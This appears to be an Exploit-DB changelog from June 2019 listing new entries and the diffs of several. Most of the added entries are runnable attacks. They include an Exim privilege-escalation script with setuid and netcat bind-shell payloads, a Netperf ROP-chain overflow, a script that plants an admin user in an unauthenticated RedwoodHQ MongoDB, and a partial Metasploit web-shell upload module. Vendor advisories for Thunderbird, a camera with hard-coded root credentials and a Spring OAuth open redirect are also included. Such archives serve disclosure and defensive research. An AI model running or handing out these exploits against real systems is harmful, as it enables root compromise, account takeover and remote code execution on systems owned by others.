DB: 2019-06-18

13 changes to exploits/shellcodes

HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write
Netperf 2.6.0 - Stack-Based Buffer Overflow
Thunderbird ESR < 60.7.XXX - Type Confusion
Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow
Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow
Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow
Exim 4.87 - 4.91 - Local Privilege Escalation
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)

AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)
RedwoodHQ 2.5.5 - Authentication Bypass
CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities
Spring Security OAuth - Open Redirector

Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)

exploits/hardware/webapps/46993.txt

@@ -0,0 +1,27 @@
+1. Advisory Information
+========================================
+Title: Clever Dog Smart Camera
+Vendor Homepage: http://www.cleverdog.com.cn/
+Tested on Camera types	: DOG-2W, DOG-2W-V4
+Vulnerability: Hardware- Multiple Vulnerabilities
+Date: 14/06/2019
+Author: Alex Akinbi      Twitter: @alexakinbi 
+
+1. Unauthenticated file disclosure:
+========================================
+An attacker on the local network has unauthenticated access to the internal SD card via HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download video archive recorded and saved on the external memory card attached. 
+For example: http://192.168.1.81:8000/20190606
+
+2. Telnet Backdoor using default credentials:
+========================================
+An attacker on the network can login remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using credentials username: " root" and password: "12345678". These credentials work on all devices.
+
+3. Login password sent over network unencrypted using Clever Dog App:
+========================================
+Using a packet sniffer, an attacker on the same network can capture data packets and view
+captured user login password MD5 hash. A weak password can be cracked and used to login to the user account.
+
+
+4. SOLUTION
+========================================
+Contact the vendor for further information regarding the proper mitigation of this vulnerability.

exploits/java/webapps/47000.txt

@@ -0,0 +1,75 @@
+# Exploit Title: Open Redirector in spring-security-oauth2
+# Date: 17 June 2019
+# Exploit Author: Riemann
+# Vendor Homepage: https://spring.io/projects/spring-security-oauth
+# Software Link: https://spring.io
+# Version: Spring Security OAuth versions 2.3 prior to 2.3.6 -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
+# Tested on: UBUNTU 16.04 LTS -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
+# CVE : CVE-2019-11269 | CVE-2019-3778
+
+# Description
+Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the redirect_uri parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code.	
+
+
+#VULNERABILITY:
+By manipulating the REDIRECT_URI parameter, an attacker can actually bypass the validation.
+
+The code causing the vulnerability is found under the package org.springframework.security.oauth2.provider.endpoint
+The Class: DefaultRedirectResolver, which method obtainMatchingRedirect does not proper sanitation 
+
+/**
+	 * Attempt to match one of the registered URIs to the that of the requested one.
+	 * 
+	 * @param redirectUris the set of the registered URIs to try and find a match. This cannot be null or empty.
+	 * @param requestedRedirect the URI used as part of the request
+	 * @return the matching URI
+	 * @throws RedirectMismatchException if no match was found
+	 */
+	private String obtainMatchingRedirect(Set<String> redirectUris, String requestedRedirect) {
+		Assert.notEmpty(redirectUris, "Redirect URIs cannot be empty");
+
+		if (redirectUris.size() == 1 && requestedRedirect == null) {
+			return redirectUris.iterator().next();
+		}
+		for (String redirectUri : redirectUris) {
+			if (requestedRedirect != null && redirectMatches(requestedRedirect, redirectUri)) {
+				return requestedRedirect;
+			}
+		}
+		throw new RedirectMismatchException("Invalid redirect: " + requestedRedirect
+				+ " does not match one of the registered values: " + redirectUris.toString());
+	}
+
+
+#POC ATTACK VECTOR
+The following request done by the CLIENT APP after the user has logged in, contains  the REDIRECT_URI parameter. The validation is bypassed by simply adding a percentage sign which triggers a redirect instead of the RedirectMismatchException error
+
+The ORIGINAL REQUEST containing a valid URI:
+GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login/oauth2/code/ HTTP/1.1
+
+The attacker then tricks the application by changing entirely the URI to another server adding a percentage for example:
+
+GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:9000/login/oauth2/code/ HTTP/1.1
+Host: localhost:8085
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:8085/auth/login
+Connection: close
+Cookie: JSESSIONID=3394FD89204BE407CB585881755C0828; JSESSIONID=C0F1D5A2F1944DCB43F2BFFA416B7A63
+Upgrade-Insecure-Requests: 1
+
+
+The RESPONSE indeed does not produce an expected OAUTH error  but redirects the user :
+
+HTTP/1.1 302 
+Cache-Control: no-store
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+X-Frame-Options: DENY
+Location: http://localhost:8086/login/oauth2/code/?code=4ecsea&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D
+Content-Language: en-US
+Content-Length: 0
+Date: Mon, 17 Jun 2019 11:06:18 GMT
+Connection: close

exploits/linux/dos/46997.py

@@ -0,0 +1,59 @@
+# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
+#
+# Tested on: Kali i686 GNU/Linux
+#
+# Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking.
+# It provides tests for both unidirectional troughput and end-to-end latency.
+#
+# Vendor: https://hewlettpackard.github.io/netperf/
+#
+# Program received signal SIGSEGV, Segmentation fault.
+# 0x41424344 in ?? ()
+# LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+#  EAX  0x6d
+#  EBX  0x41414141 ('AAAA')
+#  ECX  0x6f
+#  EDX  0x430320 (test_name) 'TCP_STREAM'
+#  EDI  0xb7ea2000 (_GLOBAL_OFFSET_TABLE_)
+#  ESI  0xbfffd2c0 0x3
+#  EBP  0x41414141 ('AAAA')
+#  ESP  0xbfffd280 0x0
+#  EIP  0x41424344 ('DCBA')
+# Invalid address 0x41424344
+# Program received signal SIGSEGV (fault address 0x41424344)
+# PoC: run -a `python -c 'print "A"*8220+"DCBA"'`
+
+from struct import pack
+
+# int mprotect(void *addr, size_t len, int prot);
+# define PROT_READ       0x1
+# define PROT_WRITE      0x2
+# define PROT_EXEC       0x4
+#
+# gef  p mprotect
+# $1 = {<text variable, no debug info>} 0xb7dbdfd0 <mprotect>
+# gef  p read
+#{ssize_t (int, void *, size_t)} 0xb7db06b0 <__GI___libc_read>
+#
+# gef  ropgadget
+#pop3ret = 0x402fea
+
+offset = 8220
+mprotect = 0xb7dbdfd0 # <mprotect>
+read = 0xb7db06b0 # <read>
+pop3ret = 0x402fea
+target_memory = 0xb7fd4000 # r-xp [vdso]
+
+rop_chain = 'A' * offset
+rop_chain += pack('I', mprotect) # mprotect
+rop_chain += pack('I', pop3ret) #  gadget
+rop_chain += pack('I', 0xbffdf000) # arg - void*
+rop_chain += pack('I', 0x100000) # arg size_t
+rop_chain += pack('I',0x7) # arg int
+rop_chain += pack('I', read)
+rop_chain += pack('I', 0xbffdf000) # return stack
+rop_chain += pack('I',0x00) # arg int fd
+rop_chain += pack('I',0xbffdf000) # arg void
+rop_chain += pack('I',0x200) # arg size_t
+
+print rop_chain

exploits/linux/local/46996.sh

@@ -0,0 +1,151 @@
+#!/bin/bash
+
+#
+# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
+# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
+# Improper validation of recipient address in deliver_message() 
+# function in /src/deliver.c may lead to remote command execution.
+# (CVE-2019-10149)
+#
+# This is a local privilege escalation exploit for "The Return 
+# of the WIZard" vulnerability reported by the Qualys Security 
+# Advisory team.
+#
+# Credits:
+# Qualys Security Advisory team (kudos for your amazing research!)
+# Dennis 'dhn' Herrmann (/dev/tcp technique)
+#
+# Usage (setuid method):
+# $ id
+# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
+# $ ./raptor_exim_wiz -m setuid
+# Preparing setuid shell helper...
+# Delivering setuid payload...
+# [...]
+# Waiting 5 seconds...
+# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
+# # id
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# Usage (netcat method):
+# $ id
+# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
+# $ ./raptor_exim_wiz -m netcat
+# Delivering netcat payload...
+# Waiting 5 seconds...
+# localhost [127.0.0.1] 31337 (?) open
+# id
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# Vulnerable platforms:
+# Exim 4.87 - 4.91
+#
+# Tested against:
+# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
+#
+
+METHOD="setuid" # default method
+PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
+PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
+
+# usage instructions
+function usage()
+{
+	echo "$0 [-m METHOD]"
+	echo
+	echo "-m setuid : use the setuid payload (default)"
+	echo "-m netcat : use the netcat payload"
+	echo
+	exit 1
+}
+
+# payload delivery
+function exploit()
+{
+	# connect to localhost:25
+	exec 3<>/dev/tcp/localhost/25
+
+	# deliver the payload
+	read -u 3 && echo $REPLY
+	echo "helo localhost" >&3
+	read -u 3 && echo $REPLY
+	echo "mail from:<>" >&3
+	read -u 3 && echo $REPLY
+	echo "rcpt to:<$PAYLOAD>" >&3
+	read -u 3 && echo $REPLY
+	echo "data" >&3
+	read -u 3 && echo $REPLY
+	for i in {1..31}
+	do
+		echo "Received: $i" >&3
+	done
+	echo "." >&3
+	read -u 3 && echo $REPLY
+	echo "quit" >&3
+	read -u 3 && echo $REPLY
+}
+
+# print banner
+echo
+echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
+echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
+echo
+
+# parse command line
+while [ ! -z "$1" ]; do
+	case $1 in
+		-m) shift; METHOD="$1"; shift;;
+		* ) usage
+		;;
+	esac
+done
+if [ -z $METHOD ]; then
+	usage
+fi
+
+# setuid method
+if [ $METHOD = "setuid" ]; then
+
+	# prepare a setuid shell helper to circumvent bash checks
+	echo "Preparing setuid shell helper..."
+	echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
+	gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
+	if [ $? -ne 0 ]; then
+		echo "Problems compiling setuid shell helper, check your gcc."
+		echo "Falling back to the /bin/sh method."
+		cp /bin/sh /tmp/pwned
+	fi
+	echo
+
+	# select and deliver the payload
+	echo "Delivering $METHOD payload..."
+	PAYLOAD=$PAYLOAD_SETUID
+	exploit
+	echo
+
+	# wait for the magic to happen and spawn our shell
+	echo "Waiting 5 seconds..."
+	sleep 5
+	ls -l /tmp/pwned
+	/tmp/pwned
+
+# netcat method
+elif [ $METHOD = "netcat" ]; then
+
+	# select and deliver the payload
+	echo "Delivering $METHOD payload..."
+	PAYLOAD=$PAYLOAD_NETCAT
+	exploit
+	echo
+
+	# wait for the magic to happen and spawn our shell
+	echo "Waiting 5 seconds..."
+	sleep 5
+	nc -v 127.0.0.1 31337
+
+# print help
+else
+	usage
+fi

exploits/multiple/dos/47001.txt

@@ -0,0 +1,107 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA256
+
+X41 D-Sec GmbH Security Advisory: X41-2019-004
+
+Type confusion in Thunderbird
+=============================
+Severity Rating: Medium
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public
+CVE: CVE-2019-11706
+CWE: 843
+CVSS Score: 6.5
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL:
+https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird
+
+Summary and Impact
+==================
+A type confusion has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was
+forked from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash the process or leak
+information from the client system via calendar replies.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and
+calendaring client, that's easy to set up and customize.
+
+Analysis
+========
+A type confusion in icalproperty.c
+icaltimezone_get_vtimezone_properties() can be triggered while parsing a
+malformed calendar attachment. Missing sanity checks allows a TZID
+property to be parsed as ICALFLOATVALUE but it is later used as a
+string.
+The bug manifests with strdup(tzid); being called with tzid containing
+a bad pointer obtained by casting to char* from a float value, which
+typically means segfaulting by dereferencing a non-mapped memory page.
+An attacker might be able to deliver an input file containing specially
+crafted float values as TZID properties which could point to arbitrary
+memory positions.
+Certain conditions could allow to exfiltrate information via a calendar
+reply or other undetermined impact.
+
+Proof of Concept
+================
+A reproducer eml file can be found in
+
+https://github.com/x41sec/advisories/tree/master/X41-2019-004
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced
+by icaljs, a JavaScript implementation of ical parsing, by setting
+calendar.icaljs = true in Thunderbird configuration.
+
+Timeline
+========
+2019-05-30 Issues reported to the vendor
+2019-06-07 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of
+information security, a strong core security team of world class
+security experts enables X41 to perform premium security services.
+Fields of expertise in the area of application security are security
+centered code reviews, binary reverse engineering and vulnerability
+discovery.
+
+Custom research and a IT security consulting and support services are
+core competencies of X41.
+-----BEGIN PGP SIGNATURE-----
+
+iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50
+CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI
+yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs
+e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa
+qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF
+TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY
+8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr
+4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4
+M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu
+gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr
+QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm
+UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk=
+=Hy9J
+-----END PGP SIGNATURE-----
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47001.zip

exploits/multiple/dos/47002.txt

@@ -0,0 +1,101 @@
+X41 D-Sec GmbH Security Advisory: X41-2019-001
+
+Heap-based buffer overflow in Thunderbird
+=========================================
+Severity Rating: High
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public 
+CVE: CVE-2019-11704
+CWE: 122
+CVSS Score: 7.8
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-001-thunderbird
+
+Summary and Impact
+==================
+A heap-based buffer overflow has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was forked
+from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash or gain remote code execution
+in the client system.
+This issue was initially reported by Brandon Perry here:
+https://bugzilla.mozilla.org/show_bug.cgi?id=1280832
+and fixed in libical upstream, but was never fixed in Thunderbird.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and calendaring
+client, that's easy to set up and customize.
+
+Analysis
+========
+A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote()
+can be triggered while parsing a calendar attachment containing a malformed
+or specially crafted string. 
+{% highlight c %}
+static char *icalmemorystrdupanddequote(const char *str)
+{
+    char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
+    char *pout = out;
+    // ...
+    for (p = str; *p!=0; p++){
+        if( *p == '\')
+        {
+            p++;
+        // ...
+        else 
+    {
+            *pout = *p;
+    }
+    }
+{% endhighlight %}
+Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the
+inputp` ends with a backslash, which enables an attacker to read out of bounds
+of the input buffer and writing out of bounds of a heap-allocated output buffer.
+The issue manifests in several ways, including out of bounds read and write,
+null-pointer dereference and frequently leads to heap corruption.
+It is expected that an attacker can exploit this vulnerability to achieve
+remote code execution.
+
+Proof of Concept
+================
+A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-001
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced by icaljs,
+a JavaScript implementation of ical parsing, by setting 
+calendar.icaljs = true in Thunderbird configuration. 
+
+Timeline
+========
+2016-06-19 Issue reported by Brandon Perry to the vendor
+2019-05-23 Issue reported by X41 D-SEC to the vendor
+2019-05-23 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of information
+security, a strong core security team of world class security experts enables
+X41 to perform premium security services.
+Fields of expertise in the area of application security are security centered
+code reviews, binary reverse engineering and vulnerability discovery.
+Custom research and a IT security consulting and support services are core
+competencies of X41.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47002.zip

exploits/multiple/dos/47003.txt

@@ -0,0 +1,81 @@
+X41 D-Sec GmbH Security Advisory: X41-2019-002
+
+Heap-based buffer overflow in Thunderbird
+=========================================
+Severity Rating: High
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public
+CVE: CVE-2019-11703
+CWE: 122
+CVSS Score: 7.8
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird
+
+Summary and Impact
+==================
+A heap-based buffer overflow has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was forked
+from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash or gain remote code execution
+in the client system.
+This issue was initially reported by Brandon Perry here:
+https://bugzilla.mozilla.org/show_bug.cgi?id=1281041
+and fixed in libical upstream, but was never fixed in Thunderbird.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and calendaring
+client, that's easy to set up and customize.
+
+Analysis
+========
+A heap-based buffer overflow in icalparser.c parser_get_next_char()
+can be triggered while parsing a calendar attachment containing a malformed
+or specially crafted string.
+The issue initially manifests with out of bounds read, but we don't discard
+it could later lead to out of bounds write.
+It is expected that an attacker can exploit this vulnerability to achieve
+remote code execution.
+
+Proof of Concept
+================
+A reproducer ical file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-002
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced by icaljs,
+a JavaScript implementation of ical parsing, by setting 
+calendar.icaljs = true in Thunderbird configuration. 
+
+Timeline
+========
+2016-06-20 Issue reported by Brandon Perry to the vendor
+2019-05-23 Issues reported to the vendor
+2019-05-23 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of information
+security, a strong core security team of world class security experts enables
+X41 to perform premium security services.
+Fields of expertise in the area of application security are security centered
+code reviews, binary reverse engineering and vulnerability discovery.
+Custom research and a IT security consulting and support services are core
+competencies of X41.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47003.zip

exploits/multiple/dos/47004.txt

@@ -0,0 +1,93 @@
+X41 D-Sec GmbH Security Advisory: X41-2019-003
+
+Stack-based buffer overflow in Thunderbird
+==========================================
+Severity Rating: High
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public
+CVE: CVE-2019-11705
+CWE: 121
+CVSS Score: 7.8
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird
+
+Summary and Impact
+==================
+A stack-based buffer overflow has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was forked
+from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash or gain remote code execution
+in the client system.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and calendaring
+client, that's easy to set up and customize.
+
+Analysis
+========
+A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules()
+can be triggered while parsing a calendar attachment containing a malformed
+or specially crafted string.
+{% highlight c %}
+static int icalrecuraddbydayrules(struct icalrecurparser *parser,
+                                    const char *vals)
+{
+    short *array = parser->rt.byday;
+    // ...
+    while (n != 0) {
+    // ...
+        if (wd != ICALNOWEEKDAY) {
+            array[i++] = (short) (sign * (wd + 8 * weekno));
+            array[i] = ICALRECURRENCEARRAYMAX;
+    }
+}
+{% endhighlight %}
+Missing sanity checks in `icalrecuradd_bydayrules()can lead to
+out of bounds write in aarraywhenweekno` takes an invalid value.
+The issue manifests as an out-of-bounds write in a stack allocated
+buffer overflow.
+It is expected that an attacker can exploit this vulnerability to achieve
+remote code execution when proper stack smashing mitigations are missing.
+
+Proof of Concept
+================
+A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-003
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced by icaljs,
+a JavaScript implementation of ical parsing, by setting 
+calendar.icaljs = true in Thunderbird configuration. 
+
+Timeline
+========
+2019-05-23 Issues reported to the vendor
+2019-05-23 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of information
+security, a strong core security team of world class security experts enables
+X41 to perform premium security services.
+Fields of expertise in the area of application security are security centered
+code reviews, binary reverse engineering and vulnerability discovery.
+Custom research and a IT security consulting and support services are core
+competencies of X41.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47004.zip

exploits/multiple/webapps/46992.py

@@ -0,0 +1,78 @@
+# -*- encoding: utf-8 -*-
+#!/usr/bin/python3
+
+# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
+# Date: 	       14-june-2019
+# Exploit Author:  EthicalHCOP
+# Version: 	       2.0 / 2.5.5
+# Vendor Homepage: https://redwoodhq.com/
+# Software Link:   https://redwoodhq.com/redwood-download/
+# Tested on: 	   Ubuntu and Windows.
+# Twitter:	       @EthicalHcop
+# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
+# Description: 	   Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
+# 
+# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have  her own Mongo Launcher. 
+# The problem is that this vendor database doesn't require any authentication to read her data. 
+# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
+# 
+# POC:             https://youtu.be/MK9AvoJDtxY
+
+import hashlib
+import hmac
+import optparse
+from pymongo import MongoClient
+
+def CreateHMAC(Pass):
+    message = bytes(Pass,encoding='utf8')
+    secret = bytes('redwood',encoding='utf8')
+    hash = hmac.new(secret, message, hashlib.md5)
+    return (hash.hexdigest())
+
+def DbConnect(ip,port):
+    uri = "mongodb://" + ip + ":" + port + "/"
+    con = MongoClient(uri)
+    return con
+
+def DbDisconnect(con):
+    con.close()
+
+def CreateBadminUser(ip, port, user, passw):
+    con = DbConnect(ip, port)
+    db = con.automationframework
+    usr = db.users
+    passw = CreateHMAC(passw)
+    data = {
+        "name": user,
+        "password": passw,
+        "tag": [],
+        "role": "Admin",
+        "username": user,
+        "status": ""
+    }
+    usr.insert_one(data)
+    DbDisconnect(con)
+
+def start():
+    parser = optparse.OptionParser('usage %prog ' + \
+                                   '-H host -P port')
+    parser.add_option('-P', '--Port', dest='port', type='string', \
+                      help='MongoDB Port')
+    parser.add_option('-H', '--Host', dest='host', type='string', \
+                      help='MongoDB Host')
+    (options, args) = parser.parse_args()
+    ip = options.host
+    port = options.port
+    if (str(ip) == "None"):
+        print("Insert Host")
+        exit(0)
+    if (str(port) == "None"):
+        port = "27017"
+    try:
+        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
+        print("[+] New user 'Badmin'/'Badmin' created.")
+    except Exception as e:
+        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))
+
+if __name__ == '__main__':
+    start()

exploits/php/remote/46999.rb

@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "AROX School-ERP Pro Unauthenticated Remote Code Execution",
+      'Description' => %q(
+        This module exploits a command execution vulnerability in AROX School-ERP.
+        "import_stud.php" and "upload_fille.php" do not have session control. 
+        Session start/check functions in Line 8,9,10 are disabled with slashes.
+        Therefore an unathenticated user can execute the command on the system.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'http://www.pentest.com.tr/exploits/AROX-School-ERP-Pro-Unauthenticated-RCE-Metasploit.html'],
+          ['URL', 'https://sourceforge.net/projects/school-erp-ultimate/'] # Download
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Jun 17 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base ERP directory path", '/'])
+      ]
+    )
+  end
+
+  def exec(shell)
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_data", "#{shell}") # shell url
+    })
+  end
+
+  def upload_shell(check)
+
+    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
